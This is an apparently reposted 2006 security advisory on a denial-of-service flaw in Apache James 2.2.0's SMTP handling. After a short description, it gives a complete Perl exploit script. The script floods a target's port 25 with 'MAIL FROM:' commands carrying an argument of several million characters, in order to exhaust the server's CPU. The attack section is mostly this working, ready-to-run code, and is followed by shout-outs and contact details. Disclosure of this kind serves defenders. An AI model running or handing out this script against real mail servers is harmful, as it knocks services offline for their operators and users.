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🗓️ 29 May 2006 00:00:00Reported by Ahmad Muammar W.KType 
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JAMES 2.2.0 Denial Of Service vulnerabilit

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[ECHO_ADV_31$2006] JAMES 2.2.0 <-- Denial Of Service  
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Author : y3dips a.k.a Ahmad Muammar W.K  
Date : April, 27th 2006  
Location : Indonesia, Jakarta  
Web : http://advisories.echo.or.id/adv/adv31-y3dips-2006.txt  
  
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Affected software description:  
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Application : Java Apache Mail Enterprise Server (a.k.a. Apache James)  
version : 2.2.0  
URL : http://jakarta.apache.org/avalon/phoenix  
Description :  
  
The Java Apache Mail Enterprise Server (a.k.a. Apache James) is   
a 100% pure Java SMTP and POP3 Mail server and NNTP News server.   
James also designed to be a complete and portable enterprise mail   
engine solution based on currently available open protocols.   
  
James is based upon the Apache Avalon application framework.   
(For more information about Avalon, please go to http://avalon.apache.org/)  
  
James requires Java 2 (either JRE 1.3 or 1.4 as of 2.0a3).  
  
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Vulnerability:  
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James SMTP servers are allowing attacker to supply a long variable at   
SMTP argument (such as MAIL) to the SMTP server, because of this   
vulnerability the Processor at server machine will have a workload till 100%  
  
  
Exploit Code:  
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-------------------------- james.pl-----------------------------------------  
  
#!/usr/bin/perl -w  
  
use IO::Socket;  
  
print "* DOS buat JAMES ver.2.2.0 by y3dips *\n";  
  
if(@ARGV == 1)  
  
{  
  
my $host = $ARGV[0];  
my $i = 1;  
  
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>"25", Reuse=>1)   
or die " Cannot Connect to Server !";  
  
while ( $i++ ) {  
print $socket "MAIL FROM:" . "fvclz" x 1000000 . "\r\n" and   
print " -- sucking CPU resources at $host .....\n";  
sleep(1);  
}  
close $socket;  
  
}   
else  
{ print " Usage: $0 [target] \r\n\n"; }   
  
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Shoutz:  
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~ the_day, moby, comex, z3robyte, K-158, c-a-s-e, S`to, lirva32, anonymous  
~ [email protected]  
~ #e-c-h-o @irc.dal.net  
  
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Contact:  
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Ahmad Muammar W.K || echo|staff || y3dips[at]echo[dot]or[dot]id  
Homepage: http://y3dips.echo.or.id/  
Blogs : http://y3d1ps.blogspot.com/  
  
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